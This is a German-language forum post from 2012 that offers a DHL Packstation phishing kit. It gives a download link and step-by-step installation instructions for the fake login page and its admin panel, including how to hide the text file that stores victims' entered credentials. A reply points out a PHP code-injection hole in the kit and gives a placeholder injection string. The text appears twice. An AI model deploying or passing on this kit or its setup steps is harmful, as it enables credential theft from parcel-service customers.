Gribbler
23.07.2012, 02:54
Hier eine DHL Packstation Phishing Seite mit Layer-Form-popup und Iframe einbindung + Webpanel.
Leicht zu modden.
http://img6.imagebanana.com/img/7qhzrr64/screen1.jpg
Code Injection möglich, NICHT VERWENDEN!!
einfach <?php /* evil code here */ ?> ins feld eintragen, das wird dann in passworter.php geschrieben uns ausgeführt *facepalm*
TUt
********************************************** |||
Installation: |||
|||
1. Alle Dateien auf einen Webspace uploaden. |||
(Auf die Dateiberechtigungen achten und eventuell anpassen)
|||
|||
|||
2. Die Datei "passworter.php" bearbeiten und davor "empty.php" löschen:
|||
- Admin Passwort ändern: In der Zeile 5 die Variable $apass = '4321' ändern.
Also 4321 in etwas Einzigartiges ändern.
- Dann "passworter.php kopieren und zu "empty.php umbenennen.
- Es sollte dann 1 x empty.php und 1x passworter.php vorhanden sein!
|||
Das Webpanel kann einfach mit ..../passworter.php aufgerufen werden.
|||
------------------------------------------------------------------
|||
Optionale Anpassungen und Anmerkungen: |||
|||
Da die Benutzereingaben auch in der GCSPOS.txt angelegt werden, kann man theoretisch auch
über HTTP auf die Datei zugreifen. Daher empfiehlt es sich den Namen der .txt zu ändern.
Dazu einfach die "send.php" und die "passworter.php" sowie "empty.php" editieren und
den Namen anpassen. |||
Des Weiteren empfiehlt es sich den Aufruf über HTTP einer .txt Datei zu verhindern.
Dies kann man mit Hilfe einer .htaccess Datei erreichen.|||
Eine entsprechende .htaccess sollte beiliegen. |||
|||
|||
|||
|||
|||
MFG sup3ria |||
|||
**********************************************----------|||*****
***********************************---------------------|||**********
**************************------------------------------|||**************
*******************-------------------------------------|||************************
*************-------------------------------------------|||**************
******--------------------------------------------------|||**********
**------------------------------------------------------|||*****
Download :
http://ul.to/r3f6op3e
Leicht zu modden.
http://img6.imagebanana.com/img/7qhzrr64/screen1.jpg
Code Injection möglich, NICHT VERWENDEN!!
einfach <?php /* evil code here */ ?> ins feld eintragen, das wird dann in passworter.php geschrieben uns ausgeführt *facepalm*
TUt
********************************************** |||
Installation: |||
|||
1. Alle Dateien auf einen Webspace uploaden. |||
(Auf die Dateiberechtigungen achten und eventuell anpassen)
|||
|||
|||
2. Die Datei "passworter.php" bearbeiten und davor "empty.php" löschen:
|||
- Admin Passwort ändern: In der Zeile 5 die Variable $apass = '4321' ändern.
Also 4321 in etwas Einzigartiges ändern.
- Dann "passworter.php kopieren und zu "empty.php umbenennen.
- Es sollte dann 1 x empty.php und 1x passworter.php vorhanden sein!
|||
Das Webpanel kann einfach mit ..../passworter.php aufgerufen werden.
|||
------------------------------------------------------------------
|||
Optionale Anpassungen und Anmerkungen: |||
|||
Da die Benutzereingaben auch in der GCSPOS.txt angelegt werden, kann man theoretisch auch
über HTTP auf die Datei zugreifen. Daher empfiehlt es sich den Namen der .txt zu ändern.
Dazu einfach die "send.php" und die "passworter.php" sowie "empty.php" editieren und
den Namen anpassen. |||
Des Weiteren empfiehlt es sich den Aufruf über HTTP einer .txt Datei zu verhindern.
Dies kann man mit Hilfe einer .htaccess Datei erreichen.|||
Eine entsprechende .htaccess sollte beiliegen. |||
|||
|||
|||
|||
|||
MFG sup3ria |||
|||
**********************************************----------|||*****
***********************************---------------------|||**********
**************************------------------------------|||**************
*******************-------------------------------------|||************************
*************-------------------------------------------|||**************
******--------------------------------------------------|||**********
**------------------------------------------------------|||*****
Download :
http://ul.to/r3f6op3e